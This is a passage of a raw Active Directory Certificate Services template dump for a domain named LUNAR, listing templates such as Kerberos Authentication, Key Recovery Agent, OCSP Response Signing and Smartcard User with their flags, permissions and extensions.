0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10260 (66144)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DC)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain ComputersAllow Enroll LUNAR\Domain ControllersAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 30Certificate Template Name (Certificate Type)IPSECIntermediateOnlineExtension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageIP security IKE intermediate (1.3.6.1.5.5.8.2.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[19]:TemplatePropCommonName = IPSECIntermediateOfflineTemplatePropFriendlyName = IPSec (Offline request)TemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.8.2.2 IP security IKE intermediateTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 7TemplatePropDescription = ComputerTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.20TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10241 (66113)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 32Certificate Template Name (Certificate Type)IPSECIntermediateOfflineExtension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageIP security IKE intermediate (1.3.6.1.5.5.8.2.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[20]:TemplatePropCommonName = KerberosAuthenticationTemplatePropFriendlyName = Kerberos AuthenticationTemplatePropEKUs =4 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.1 Server Authentication1.3.6.1.4.1.311.20.2.2 Smart Card Logon1.3.6.1.5.2.3.5 KDC AuthenticationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 6e (110)TemplatePropDescription = ComputerTemplatePropSchemaVersion = 2TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.33 Kerberos AuthenticationTemplatePropV1ApplicationPolicy =4 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.1 Server Authentication1.3.6.1.4.1.311.20.2.2 Smart Card Logon1.3.6.1.5.2.3.5 KDC AuthenticationTemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 8400000 (138412032)CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS -- 400000 (4194304)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10060 (65632)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;ED)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;ED)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Enterprise Read-only Domain ControllersAllow Auto-Enroll LUNAR\Enterprise Read-only Domain ControllersAllow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Domain ControllersAllow Enroll LUNAR\Enterprise AdminsAllow Auto-Enroll LUNAR\Domain ControllersAllow Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSAllow Auto-Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=Kerberos Authentication(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.33)Major Version Number=110Minor Version Number=0Extension[1]:2.5.29.37: Flags = 0, Length = 2bEnhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Server Authentication (1.3.6.1.5.5.7.3.1)Smart Card Logon (1.3.6.1.4.1.311.20.2.2)KDC Authentication (1.3.6.1.5.2.3.5)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = 33Application Policies[1]Application Certificate Policy:Policy Identifier=Client Authentication[2]Application Certificate Policy:Policy Identifier=Server Authentication[3]Application Certificate Policy:Policy Identifier=Smart Card Logon[4]Application Certificate Policy:Policy Identifier=KDC AuthenticationTemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[21]:TemplatePropCommonName = KeyRecoveryAgentTemplatePropFriendlyName = Key Recovery AgentTemplatePropEKUs =1 ObjectIds:1.3.6.1.4.1.311.21.6 Key Recovery AgentTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.0TemplatePropMajorRevision = 69 (105)TemplatePropDescription = Key recovery agentTemplatePropSchemaVersion = 2TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.27 Key Recovery AgentTemplatePropV1ApplicationPolicy =1 ObjectIds:1.3.6.1.4.1.311.21.6 Key Recovery AgentTemplatePropEnrollmentFlags = 27 (39)CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_PEND_ALL_REQUESTS -- 2CT_FLAG_PUBLISH_TO_KRA_CONTAINER -- 4CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 82000000 (-2113929216)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10020 (65568)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=Key Recovery Agent(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.27)Major Version Number=105Minor Version Number=0Extension[1]:2.5.29.37: Flags = 0, Length = dEnhanced Key UsageKey Recovery Agent (1.3.6.1.4.1.311.21.6)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageKey Encipherment (20)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = fApplication Policies[1]Application Certificate Policy:Policy Identifier=Key Recovery AgentTemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[22]:TemplatePropCommonName = OCSPResponseSigningTemplatePropFriendlyName = OCSP Response SigningTemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.9 OCSP SigningTemplatePropMajorRevision = 65 (101)TemplatePropDescription = ComputerTemplatePropSchemaVersion = 3TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.32 OCSP Response SigningTemplatePropV1ApplicationPolicy =1 ObjectIds:1.3.6.1.5.5.7.3.9 OCSP SigningTemplatePropAsymmetricAlgorithm = RSATemplatePropKeySecurityDescriptor = D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;GR;;;S-1-5-80-3804348527-3718992918-2141599610-3686422417-2726379419)Allow Write BUILTIN\AdministratorsAllow Write NT AUTHORITY\SYSTEMAllow Read S-1-5-80-3804348527-3718992918-2141599610-3686422417-2726379419TemplatePropHashAlgorithm = SHA1TemplatePropKeyUsage = 2TemplatePropEnrollmentFlags = 5000 (20480)CT_FLAG_ADD_OCSP_NOCHECK -- 1000 (4096)CT_FLAG_NOREVOCATIONINFOINISSUEDCERTS -- 4000 (16384)TemplatePropSubjectNameFlags = 18000000 (402653184)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10240 (66112)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =5 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=OCSP Response Signing(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.32)Major Version Number=101Minor Version Number=0Extension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageOCSP Signing (1.3.6.1.5.5.7.3.9)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature (80)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = eApplication Policies[1]Application Certificate Policy:Policy Identifier=OCSP SigningExtension[4]:1.3.6.1.5.5.7.48.1.5: Flags = 0, Length = 2OCSP No Revocation Checking0000 05 00 ..0000: 05 00 ; NULL (0 Bytes)TemplatePropValidityPeriod = 2 WeeksTemplatePropRenewalPeriod = 2 DaysTemplate[23]:TemplatePropCommonName = RASAndIASServerTemplatePropFriendlyName = RAS and IAS ServerTemplatePropEKUs =2 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.1 Server AuthenticationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 65 (101)TemplatePropDescription = ComputerTemplatePropSchemaVersion = 2TemplatePropMinorRevision = 0TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.31 RAS and IAS ServerTemplatePropV1ApplicationPolicy =2 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.5.5.7.3.1 Server AuthenticationTemplatePropEnrollmentFlags = 20 (32)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)TemplatePropSubjectNameFlags = 48000000 (1207959552)CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME -- 40000000 (1073741824)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10260 (66144)CT_FLAG_AUTO_ENROLLMENT -- 20 (32)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;RS)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Enroll LUNAR\RAS and IAS ServersAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =4 Extensions:Extension[0]:1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2bCertificate Template InformationTemplate=RAS and IAS Server(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.31)Major Version Number=101Minor Version Number=0Extension[1]:2.5.29.37: Flags = 0, Length = 16Enhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Server Authentication (1.3.6.1.5.5.7.3.1)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)Extension[3]:1.3.6.1.4.1.311.21.10: Flags = 0, Length = 1aApplication Policies[1]Application Certificate Policy:Policy Identifier=Client Authentication[2]Application Certificate Policy:Policy Identifier=Server AuthenticationTemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[24]:TemplatePropCommonName = CATemplatePropFriendlyName = Root Certification AuthorityTemplatePropCryptoProviders =0: Microsoft Enhanced Cryptographic Provider v1.0TemplatePropMajorRevision = 5TemplatePropDescription = Certification authority (CA)TemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.17TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 10 (16)CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 100d1 (65745)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_EXPORTABLE_KEY -- 10 (16)CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_IS_CA -- 80 (128)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 6Certificate Template Name (Certificate Type)CAExtension[1]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing (86)Extension[2]:2.5.29.19: Flags = 1(Critical), Length = 5Basic ConstraintsSubject Type=CAPath Length Constraint=NoneTemplatePropValidityPeriod = 5 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[25]:TemplatePropCommonName = OfflineRouterTemplatePropFriendlyName = Router (Offline request)TemplatePropEKUs =1 ObjectIds:1.3.6.1.5.5.7.3.2 Client AuthenticationTemplatePropCryptoProviders =0: Microsoft RSA SChannel Cryptographic ProviderTemplatePropMajorRevision = 4TemplatePropDescription = ComputerTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.21TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 1CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10241 (66113)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1CT_FLAG_MACHINE_TYPE -- 40 (64)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1cCertificate Template Name (Certificate Type)OfflineRouterExtension[1]:2.5.29.37: Flags = 0, Length = cEnhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 2 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[26]:TemplatePropCommonName = SmartcardLogonTemplatePropFriendlyName = Smartcard LogonTemplatePropEKUs =2 ObjectIds:1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.4.1.311.20.2.2 Smart Card LogonTemplatePropMajorRevision = 6TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.5TemplatePropEnrollmentFlags = 0TemplatePropSubjectNameFlags = 82000000 (-2113929216)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 10200 (66048)CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 Extensions:Extension[0]:1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1eCertificate Template Name (Certificate Type)SmartcardLogonExtension[1]:2.5.29.37: Flags = 0, Length = 18Enhanced Key UsageClient Authentication (1.3.6.1.5.5.7.3.2)Smart Card Logon (1.3.6.1.4.1.311.20.2.2)Extension[2]:2.5.29.15: Flags = 1(Critical), Length = 4Key UsageDigital Signature, Key Encipherment (a0)TemplatePropValidityPeriod = 1 YearsTemplatePropRenewalPeriod = 6 WeeksTemplate[27]:TemplatePropCommonName = SmartcardUserTemplatePropFriendlyName = Smartcard UserTemplatePropEKUs =3 ObjectIds:1.3.6.1.5.5.7.3.4 Secure Email1.3.6.1.5.5.7.3.2 Client Authentication1.3.6.1.4.1.311.20.2.2 Smart Card LogonTemplatePropMajorRevision = b (11)TemplatePropDescription = UserTemplatePropSchemaVersion = 1TemplatePropMinorRevision = 1TemplatePropRASignatureCount = 0TemplatePropMinimumKeySize = 800 (2048)TemplatePropOID =1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.3TemplatePropEnrollmentFlags = 9CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1CT_FLAG_PUBLISH_TO_DS -- 8TemplatePropSubjectNameFlags = a6000000 (-1509949440)CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL -- 4000000 (67108864)CT_FLAG_SUBJECT_REQUIRE_EMAIL -- 20000000 (536870912)CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)TemplatePropPrivateKeyFlags = 0CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0TemplatePropGeneralFlags = 1020a (66058)CT_FLAG_ADD_EMAIL -- 2CT_FLAG_PUBLISH_TO_DS -- 8CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)CT_FLAG_IS_DEFAULT -- 10000 (65536)TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)Allow Enroll LUNAR\Domain AdminsAllow Enroll LUNAR\Enterprise AdminsAllow Full Control LUNAR\Domain AdminsAllow Full Control LUNAR\Enterprise AdminsAllow Read NT AUTHORITY\Authenticated UsersTemplatePropExtensions =3 